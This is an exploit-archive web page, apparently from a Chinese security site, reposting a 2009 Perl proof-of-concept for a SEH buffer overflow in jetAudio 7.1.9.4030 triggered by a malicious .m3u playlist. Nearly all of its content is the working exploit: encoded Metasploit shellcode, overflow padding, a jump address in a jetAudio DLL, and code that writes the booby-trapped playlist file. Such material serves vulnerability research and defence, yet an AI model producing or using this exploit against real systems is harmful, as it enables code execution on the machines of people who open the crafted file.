首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
jetAudio 7.1.9.4030 plus vx (.m3u) Universal BOF Exploit (SEH)
来源:www.vfcocus.net 作者:germaya_x 发布时间:2009-08-07  
#!/usr/bin/perl
#soft: jetAudio v 7.1.9.4030 plus vx (.m3u ) universal buffer Overflow exploit (SEH)
#based on: HACK4LOVE (http://www.milw0rm.com/exploits/9359)
#exploited by: germaya_x
tested on: xp sp3 (EN)
#bug date: August 05 09
#greetz: hack4love
###############################################################################################
my $header = "http://";
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
my $bof="\x41" x 1017;
my $eip="\xeb\x06\x90\x90";
my $eip_next="\x87\xC2\x6C\x00"; #jmp esp in jdl_ximage.dll (uni address)
my $nop="\x90" x 10;

################################################################################################
open(MYFILE,'>>exploit.m3u');
print MYFILE $header.$bof.$eip_next.$nop.$shellcode;
close(MYFILE);
################################################################################################

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·UltraPlayer Media Player 2.112
·JetAudio 7.1.9.4030 Universal
·jetAudio v 7.1.9.4030 plus vx
·FreeBSD 7.2-RELEASE SCTP Local
·Tuniac v.090517c (.M3U File) L
·JetAudio 7.5.3.15 (.M3U File)
·Linux Kernel < 2.6.14.6 procfs
·A2 Media Player Pro 2.51 (.m3u
·MS Internet Explorer 8.0.7100.
·Playlistmaker 1.5 (.M3U/M3L Fi
·Groovy Media Player 1.2.0 (.m3
·serv-u8 本地提权
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved